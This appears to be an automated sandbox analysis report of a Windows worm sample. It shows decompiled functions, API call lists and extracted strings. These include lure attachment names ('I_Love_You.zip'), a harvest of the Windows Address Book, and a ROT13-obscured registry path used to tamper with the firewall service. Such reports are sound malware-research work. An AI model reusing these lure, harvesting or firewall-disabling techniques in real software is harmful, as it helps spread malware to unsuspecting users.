                                                                          0x10001af1
                                                                          0x10001af8
                                                                          0x10001b01
                                                                          0x10001b1b
                                                                          0x10001b20
                                                                          0x10001b27
                                                                          0x10001b34
                                                                          0x10001b38
                                                                          0x10001b3e
                                                                          0x10001b42
                                                                          0x10001b49
                                                                          0x10001b4e
                                                                          0x10001b53
                                                                          0x10001b55
                                                                          0x10001b59
                                                                          0x10001b60
                                                                          0x10001b65
                                                                          0x10001b6f
                                                                          0x10001b6f
                                                                          0x10001b82
                                                                          0x10001b85
                                                                          0x10001b8d
                                                                          0x10001b91
                                                                          0x10001b94
                                                                          0x10001b99
                                                                          0x10001ba0
                                                                          0x10001bac
                                                                          0x10001bac
                                                                          0x10001ba0
                                                                          0x10001b27
                                                                          0x10001af8
                                                                          0x10001ada
                                                                          0x10001ab3
                                                                          0x10001bbd

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.259076355.0000000010001000.00000040.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000000.00000002.259070497.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259083925.0000000010005000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259107376.0000000010008000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259117363.000000001000A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259125606.000000001000B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259132398.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_10000000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: sread$lstrcmp$swrite
                                                                          • String ID:
                                                                          • API String ID: 1841987066-0
                                                                          • Opcode ID: 50c29eabb491e391b19f89d7d52041d898abba3f9a3e0c212c36fa54c6efb9ac
                                                                          • Instruction ID: 02893088ef83d42b468dfb49456edce95aa81bf5added6d024bd8f99ab7a1a41
                                                                          • Opcode Fuzzy Hash: 50c29eabb491e391b19f89d7d52041d898abba3f9a3e0c212c36fa54c6efb9ac
                                                                          • Instruction Fuzzy Hash: EF316D74D083589EE711DF2485423EEBFEAEF84380F44849ED99897285E738DA85CB52
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 40%
                                                                          			E0040BC80(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
                                                                          				intOrPtr _v8;
                                                                          				intOrPtr _v12;
                                                                          				intOrPtr _v16;
                                                                          				void* _v20;
                                                                          				void* _v24;
                                                                          				intOrPtr _v40;
                                                                          				intOrPtr _v52;
                                                                          				void* _t31;
                                                                          				long _t34;
                                                                          				void* _t35;
                                                                          				void* _t36;
                                                                          				intOrPtr* _t39;
                                                                          				void* _t41;
                                                                          				void* _t52;
                                                                          				intOrPtr _t56;
                                                                          				intOrPtr _t65;
                                                                          				intOrPtr* _t67;
                                                                          				long* _t68;
                                                                          				intOrPtr* _t69;
                                                                          
                                                                          				_v8 = __edi;
                                                                          				_t60 = _a4;
                                                                          				_v16 = __ebx;
                                                                          				_v12 = __esi;
                                                                          				_t63 =  *(_t60 + 0xc);
                                                                          				if( *(_t60 + 0xc) == 0) {
                                                                          					 *_t67 = _t60;
                                                                          					return E0040B740();
                                                                          				} else {
                                                                          					_t31 =  *0x418284;
                                                                          					if(_t31 == 0) {
                                                                          						E0040B0E0(_t31);
                                                                          						_t31 =  *0x418284;
                                                                          					}
                                                                          					_t49 =  *((intOrPtr*)(_t31 + 0x30));
                                                                          					if( *((intOrPtr*)(_t31 + 0x30)) < 0) {
                                                                          						E0040B3B0(_t49, _t63);
                                                                          						_t31 =  *0x418284;
                                                                          					}
                                                                          					if( *((intOrPtr*)(_t31 + 0x30)) != 0) {
                                                                          						_t34 = GetLastError();
                                                                          						 *_t67 =  *((intOrPtr*)(_t31 + 0x2c));
                                                                          						_t63 = _t34;
                                                                          						_t35 = TlsGetValue(??);
                                                                          						_t68 = _t67 - 4;
                                                                          						 *_t68 = _t34;
                                                                          						SetLastError(??);
                                                                          						_t36 = _t35;
                                                                          						_t67 = _t68 - 4;
                                                                          					} else {
                                                                          						_t36 =  *(_t31 + 0x28);
                                                                          					}
                                                                          					_v20 = _t36;
                                                                          					_v24 = _t36;
                                                                          					if(E0040B8D0(_t60,  &_v24) == 7) {
                                                                          						_t41 =  *0x418284;
                                                                          						_t52 = _v24;
                                                                          						if(_t41 == 0) {
                                                                          							E0040B0E0(_t41);
                                                                          							_t41 =  *0x418284;
                                                                          						}
                                                                          						if( *((intOrPtr*)(_t41 + 0x30)) < 0) {
                                                                          							E0040B3B0(_t52, _t63);
                                                                          							_t41 =  *0x418284;
                                                                          						}
                                                                          						_t60 =  *((intOrPtr*)(_t41 + 0x30));
                                                                          						if( *((intOrPtr*)(_t41 + 0x30)) != 0) {
                                                                          							_v40 = _t52;
                                                                          							 *_t67 =  *((intOrPtr*)(_t41 + 0x2c));
                                                                          							if(TlsSetValue(??, ??) == 0) {
                                                                          								GetLastError();
                                                                          							}
                                                                          						} else {
                                                                          							 *((intOrPtr*)(_t41 + 0x28)) = _t52;
                                                                          						}
                                                                          						_t31 = _v24;
                                                                          						_t65 =  *((intOrPtr*)(_t31 + 0x20));
                                                                          						_t67 =  *((intOrPtr*)(_t31 + 0x28));
                                                                          						goto __ecx;
                                                                          					}
                                                                          					abort();
                                                                          					_push(_t65);
                                                                          					_t69 = _t67 - 8;
                                                                          					_t56 = _v40;
                                                                          					_t39 =  *((intOrPtr*)(_t56 + 8));
                                                                          					if(_t39 != 0) {
                                                                          						_v52 = _t56;
                                                                          						 *_t69 = 1;
                                                                          						return  *_t39();
                                                                          					} else {
                                                                          						return _t39;
                                                                          					}
                                                                          				}
                                                                          			}






















                                                                          0x0040bc86
                                                                          0x0040bc89
                                                                          0x0040bc8c
                                                                          0x0040bc8f
                                                                          0x0040bc92
                                                                          0x0040bc97
                                                                          0x0040bd12
                                                                          0x0040bd26
                                                                          0x0040bc99
                                                                          0x0040bc99
                                                                          0x0040bca0
                                                                          0x0040bd06
                                                                          0x0040bd0b
                                                                          0x0040bd0b
                                                                          0x0040bca2
                                                                          0x0040bca7
                                                                          0x0040bd81
                                                                          0x0040bd86
                                                                          0x0040bd86
                                                                          0x0040bcb2
                                                                          0x0040bd2a
                                                                          0x0040bd30
                                                                          0x0040bd33
                                                                          0x0040bd35
                                                                          0x0040bd3b
                                                                          0x0040bd40
                                                                          0x0040bd43
                                                                          0x0040bd49
                                                                          0x0040bd4b
                                                                          0x0040bcb4
                                                                          0x0040bcb4
                                                                          0x0040bcb4
                                                                          0x0040bcb7
                                                                          0x0040bcbd
                                                                          0x0040bcca
                                                                          0x0040bcd0
                                                                          0x0040bcd5
                                                                          0x0040bcda
                                                                          0x0040bd72
                                                                          0x0040bd77
                                                                          0x0040bd77
                                                                          0x0040bce5
                                                                          0x0040bd90
                                                                          0x0040bd95
                                                                          0x0040bd95
                                                                          0x0040bceb
                                                                          0x0040bcf0
                                                                          0x0040bd56
                                                                          0x0040bd5a
                                                                          0x0040bd68
                                                                          0x0040bd6a
                                                                          0x0040bd6a
                                                                          0x0040bcf2
                                                                          0x0040bcf2
                                                                          0x0040bcf2
                                                                          0x0040bcf5
                                                                          0x0040bcfe
                                                                          0x0040bd01
                                                                          0x0040bd04
                                                                          0x0040bd04
                                                                          0x0040bd9f
                                                                          0x0040bdb0
                                                                          0x0040bdb3
                                                                          0x0040bdb6
                                                                          0x0040bdb9
                                                                          0x0040bdbe
                                                                          0x0040bdc2
                                                                          0x0040bdc6
                                                                          0x0040bdd0
                                                                          0x0040bdc1
                                                                          0x0040bdc1
                                                                          0x0040bdc1
                                                                          0x0040bdbe

                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0040A5BE,?,?,?,?,?,0040920F), ref: 0040BD2A
                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,0040A5BE,?,?,?,?,?,0040920F), ref: 0040BD35
                                                                          • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,0040A5BE), ref: 0040BD43
                                                                          • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0040A5BE), ref: 0040BD5D
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040A5BE), ref: 0040BD6A
                                                                          • abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,0040A5BE), ref: 0040BD9F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$Value$abort
                                                                          • String ID:
                                                                          • API String ID: 2626461348-0
                                                                          • Opcode ID: d44fb8144051525f46a2ddd0a77b2159513e5a59cadc495b3667b9b5871e9868
                                                                          • Instruction ID: 54ad4b7b80f31364e908b692a5ee0ad386bd410343df76c18df6e0f8c4ff5425
                                                                          • Opcode Fuzzy Hash: d44fb8144051525f46a2ddd0a77b2159513e5a59cadc495b3667b9b5871e9868
                                                                          • Instruction Fuzzy Hash: A0312A70A04609CFDB40EF65D680AAAB7B4FF48300B1585BED855AB391DB34AD01CBDE
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • lstrcat.KERNEL32 ref: 00402A87
                                                                            • Part of subcall function 00404EAE: GetTickCount.KERNEL32 ref: 00404EB8
                                                                            • Part of subcall function 00404EAE: srand.MSVCRT ref: 00404EC0
                                                                            • Part of subcall function 00404EAE: rand.MSVCRT ref: 00404EC5
                                                                          • lstrcat.KERNEL32 ref: 00402AAF
                                                                          • lstrcat.KERNEL32 ref: 00402AD1
                                                                          • lstrcat.KERNEL32 ref: 00402AEB
                                                                          • Sleep.KERNEL32 ref: 00402EC5
                                                                          • lstrcat.KERNEL32 ref: 00402B10
                                                                            • Part of subcall function 00404F0A: GetModuleHandleA.KERNEL32 ref: 00404F27
                                                                            • Part of subcall function 00404F0A: LoadLibraryA.KERNEL32 ref: 00404F41
                                                                            • Part of subcall function 00404F0A: InternetGetConnectedState.WININET ref: 00404F6B
                                                                          Strings
                                                                          • Happy_birthday_to_you.zip, xrefs: 00402B05
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: lstrcat$ConnectedCountHandleInternetLibraryLoadModuleSleepStateTickrandsrand
                                                                          • String ID: Happy_birthday_to_you.zip
                                                                          • API String ID: 1562643418-1870604427
                                                                          • Opcode ID: ab93de260d9d7b3f63fc38cf511f9f6f11fd8cbf9b2553f54f0ef4a6ba202e59
                                                                          • Instruction ID: cc83420afc5f1d077a3f5b7fbaa549a80263fd77f6117133aa0d2265757cdded
                                                                          • Opcode Fuzzy Hash: ab93de260d9d7b3f63fc38cf511f9f6f11fd8cbf9b2553f54f0ef4a6ba202e59
                                                                          • Instruction Fuzzy Hash: 3C21FF759043048BC710EF64D98169EBBF0EF84314F40897FE584A7341EB389698CF96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • lstrcat.KERNEL32 ref: 004029DD
                                                                            • Part of subcall function 00404EAE: GetTickCount.KERNEL32 ref: 00404EB8
                                                                            • Part of subcall function 00404EAE: srand.MSVCRT ref: 00404EC0
                                                                            • Part of subcall function 00404EAE: rand.MSVCRT ref: 00404EC5
                                                                          • lstrcat.KERNEL32 ref: 00402A05
                                                                          • lstrcat.KERNEL32 ref: 00402A27
                                                                          • lstrcat.KERNEL32 ref: 00402A41
                                                                          • Sleep.KERNEL32 ref: 00402EC5
                                                                          • lstrcat.KERNEL32 ref: 00402A66
                                                                            • Part of subcall function 00404F0A: GetModuleHandleA.KERNEL32 ref: 00404F27
                                                                            • Part of subcall function 00404F0A: LoadLibraryA.KERNEL32 ref: 00404F41
                                                                            • Part of subcall function 00404F0A: InternetGetConnectedState.WININET ref: 00404F6B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: lstrcat$ConnectedCountHandleInternetLibraryLoadModuleSleepStateTickrandsrand
                                                                          • String ID: I_Love_You.zip
                                                                          • API String ID: 1562643418-69349870
                                                                          • Opcode ID: 247b01801a7c8732d276e468bcc8b3b88bf3ed5fd2371333381e1382a1eb55e6
                                                                          • Instruction ID: f9bbb920bae34a53852b7a8ae3bd8492a159d249183d5996932f43f3eb41e795
                                                                          • Opcode Fuzzy Hash: 247b01801a7c8732d276e468bcc8b3b88bf3ed5fd2371333381e1382a1eb55e6
                                                                          • Instruction Fuzzy Hash: 3A21DF759043048BCB11EF64D98169EBBF4EF84314F40897FE585A7381EB389698CF96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: ??3@fclosefopenfreadmallocrealloc
                                                                          • String ID:
                                                                          • API String ID: 418953348-0
                                                                          • Opcode ID: cd82c47d2a0d14179ee5ff6a2821234b899268957919a795133ff3fc6cf18751
                                                                          • Instruction ID: 75d7d26d9218dbdf86978dcb23e5f4fbbd0c24693f44c664e0b05ab087c45b19
                                                                          • Opcode Fuzzy Hash: cd82c47d2a0d14179ee5ff6a2821234b899268957919a795133ff3fc6cf18751
                                                                          • Instruction Fuzzy Hash: 6E115A705087049BD300AF2AC4C475EFAE4EF44358F05893EE8C8AB3D2E77D98458B9A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetAtomNameA.KERNEL32 ref: 0040B05F
                                                                            • Part of subcall function 0040C130: fprintf.MSVCRT ref: 0040C15D
                                                                            • Part of subcall function 0040C130: fflush.MSVCRT ref: 0040C16D
                                                                            • Part of subcall function 0040C130: abort.MSVCRT(?,?,?,?,?,0040B0BE), ref: 0040C172
                                                                          Strings
                                                                          • w32_sharedptr->size == sizeof(W32_EH_SHARED), xrefs: 0040B097
                                                                          • %s:%u: failed assertion `%s', xrefs: 0040B0A9
                                                                          • GetAtomNameA (atom, s, sizeof(s)) != 0, xrefs: 0040B0BE
                                                                          • ../../gcc/gcc/config/i386/w32-shared-ptr.c, xrefs: 0040B0B0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: AtomNameabortfflushfprintf
                                                                          • String ID: %s:%u: failed assertion `%s'$../../gcc/gcc/config/i386/w32-shared-ptr.c$GetAtomNameA (atom, s, sizeof(s)) != 0$w32_sharedptr->size == sizeof(W32_EH_SHARED)
                                                                          • API String ID: 2513348418-2696369246
                                                                          • Opcode ID: 055b4f41610cf93c2adfb2054d8dbcce5caf57ff53a8ecc1339ea75a1b6def78
                                                                          • Instruction ID: b50ba6c1e0c48ccbfb779697640dc8edf1bacce25001569c98304d8c7ef809a2
                                                                          • Opcode Fuzzy Hash: 055b4f41610cf93c2adfb2054d8dbcce5caf57ff53a8ecc1339ea75a1b6def78
                                                                          • Instruction Fuzzy Hash: E50152B0A043459BCB049F65C49426BBFE0EB98304F10C83FD999AB785D37DD8849B8E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • RegOpenKeyExA.ADVAPI32 ref: 004039A1
                                                                          • memset.MSVCRT ref: 004039CA
                                                                          • RegQueryValueExA.ADVAPI32 ref: 00403A08
                                                                          • RegCloseKey.ADVAPI32 ref: 00403A19
                                                                            • Part of subcall function 00403390: CreateFileA.KERNEL32 ref: 004033D2
                                                                            • Part of subcall function 00403390: GetFileSize.KERNEL32 ref: 00403409
                                                                            • Part of subcall function 00403390: CreateFileMappingA.KERNEL32 ref: 00403448
                                                                            • Part of subcall function 00403390: CloseHandle.KERNEL32 ref: 0040346E
                                                                          Strings
                                                                          • Software\Microsoft\WAB\WAB4\Wab File Name, xrefs: 00403992
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: File$CloseCreate$HandleMappingOpenQuerySizeValuememset
                                                                          • String ID: Software\Microsoft\WAB\WAB4\Wab File Name
                                                                          • API String ID: 1684987478-619501371
                                                                          • Opcode ID: 693d4b3274321ff71e2d42a915d5b2b45d06d87ff800bc67c20065d722b332b6
                                                                          • Instruction ID: fb9affdcd003a3e7f59b61beff737c010c0f055de032600ad664b438ea4410d9
                                                                          • Opcode Fuzzy Hash: 693d4b3274321ff71e2d42a915d5b2b45d06d87ff800bc67c20065d722b332b6
                                                                          • Instruction Fuzzy Hash: EB119DB0804755DFD710EF25C98939FBBF4BB44348F40896EE88867381D7B996888F96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Strings
                                                                          • Start, xrefs: 00403EF5
                                                                          • Flfgrz\PheeragPbagebyFrg\Freivprf\FunerqNpprff, xrefs: 00403E8C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpenValue
                                                                          • String ID: Flfgrz\PheeragPbagebyFrg\Freivprf\FunerqNpprff$Start
                                                                          • API String ID: 779948276-912140713
                                                                          • Opcode ID: e296dfc2d9eb7ef9e349c09ed36716ed2307b031d9a666ead56965e2f71c0cc2
                                                                          • Instruction ID: 3e2d9bc1c4b7ca1d7eb8bd648e7caadb70e702096ae42ff705bea3b0919a5c49
                                                                          • Opcode Fuzzy Hash: e296dfc2d9eb7ef9e349c09ed36716ed2307b031d9a666ead56965e2f71c0cc2
                                                                          • Instruction Fuzzy Hash: 7101DBF0808315DBD710EF25C58575EBBF4BB44348F40C96DE988A7242E7789A4C8F56
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 37%
                                                                          			E00405316(char* __ebx) {
                                                                          				void* _v8;
                                                                          				char _v76;
                                                                          				intOrPtr _v88;
                                                                          				int _t5;
                                                                          				char* _t9;
                                                                          				char* _t11;
                                                                          				char* _t13;
                                                                          				void* _t14;
                                                                          				intOrPtr* _t15;
                                                                          				intOrPtr* _t16;
                                                                          				char** _t17;
                                                                          
                                                                          				_t15 = _t14 - 0x54;
                                                                          				_v88 = 0x40;
                                                                          				_t11 =  &_v76;
                                                                          				 *_t15 = _t11;
                                                                          				_t5 = gethostname(__ebx, ??);
                                                                          				_t16 = _t15 - 8;
                                                                          				 *_t16 = _t11;
                                                                          				L004086D8();
                                                                          				_t17 = _t16 - 4;
                                                                          				_t13 = "192.168.1.2";
                                                                          				if(_t5 != 0) {
                                                                          					_t9 =  *( *( *(_t5 + 0xc)));
                                                                          					 *_t17 = _t9;
                                                                          					L004086E0();
                                                                          					_t13 = _t9;
                                                                          				}
                                                                          				return _t13;
                                                                          			}














                                                                          0x0040531a
                                                                          0x0040531d
                                                                          0x00405325
                                                                          0x00405328
                                                                          0x0040532b
                                                                          0x00405330
                                                                          0x00405333
                                                                          0x00405336
                                                                          0x0040533b
